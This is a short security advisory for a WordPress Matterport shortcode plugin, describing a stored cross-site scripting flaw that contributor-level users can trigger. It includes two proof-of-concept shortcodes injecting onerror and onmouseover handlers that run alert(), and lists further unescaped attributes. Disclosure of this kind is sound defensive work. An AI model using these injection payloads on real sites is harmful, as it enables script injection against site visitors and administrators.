Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
As a contributor, put the following shortcodes in the page/post and view/preview it
[matterport src="test" width='1 " onerror="alert(/XSS1/)']
[matterport src="test" window='"onmouseover=alert(/XSS2/)//'] (and move the mouse over the generated block to trigger the XSS)
Other affected attributes: height, help, hl, qs, brand, lang, hhl, kb, lp, title, tourcta, maxzoom, minzoom, zoomtrans, mpv, filter, minimapfilter, copyright, ga, aa